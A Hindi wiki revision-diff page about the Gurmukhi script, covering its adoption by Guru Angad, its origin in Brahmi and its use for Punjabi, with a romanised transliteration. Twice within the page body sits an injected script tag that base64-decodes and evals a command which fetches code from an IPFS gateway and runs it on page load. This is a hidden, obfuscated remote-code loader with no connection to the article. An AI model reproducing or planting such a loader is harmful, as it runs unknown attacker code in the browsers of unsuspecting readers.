Difference between revisions of "गुरुमुखी लिपि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:हिन्दू धर्म कोश (को हटा दिया गया हैं।))
Line 1: Line 1:
 
*गुरुमुखी लिपि वह लिपि है, जिसमें [[सिक्ख|सिक्खों]] का धर्मग्रन्थ 'ग्रन्थ साहब' लिखा हुआ है।  
 
*गुरुमुखी लिपि वह लिपि है, जिसमें [[सिक्ख|सिक्खों]] का धर्मग्रन्थ 'ग्रन्थ साहब' लिखा हुआ है।  
*[[गुरु नानक]] के उत्तराधिकारी [[गुरु अंगद]] ने नानक के पदों के लिए गुरुमुखी लिपि को स्वीकार किया, जो [[ब्राह्मी]] से निकली थी और [[पंजाब]] में उनके समय में प्रचलित थी।  
+
*[[गुरु नानक]] के उत्तराधिकारी [[गुरु अंगद]] ने नानक के पदों के लिए गुरुमुखी लिपि को स्वीकार किया, जो [[ब्राह्मी लिपि|ब्राह्मी]] से निकली थी और [[पंजाब]] में उनके समय में प्रचलित थी।  
 
*गुरुवाणी इसमें लिखी गई, इसलिए इसका नाम 'गुरुमुखी' पड़ गया।  
 
*गुरुवाणी इसमें लिखी गई, इसलिए इसका नाम 'गुरुमुखी' पड़ गया।  
 
*वास्तव में 'गुरुमुखी' लिपि का नाम है, परन्तु भूल से लोग इसे भाषा भी समझ लेते हैं।  
 
*वास्तव में 'गुरुमुखी' लिपि का नाम है, परन्तु भूल से लोग इसे भाषा भी समझ लेते हैं।  

Revision as of 09:18, 22 February 2011

  • gurumukhi lipi vah lipi hai, jisamean sikkhoan ka dharmagranth 'granth sahab' likha hua hai.
  • guru nanak ke uttaradhikari guru aangad ne nanak ke padoan ke lie gurumukhi lipi ko svikar kiya, jo brahmi se nikali thi aur panjab mean unake samay mean prachalit thi.
  • guruvani isamean likhi gee, isalie isaka nam 'gurumukhi' p d gaya.
  • vastav mean 'gurumukhi' lipi ka nam hai, parantu bhool se log ise bhasha bhi samajh lete haian.
  • is lipi ki vahi varnamala hai, jo sanskrit aur bharat ki any pradeshik bhashaoan ki hai.
  • is samay panjabi bhasha ko keval sikkh log is lipi mean likhate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh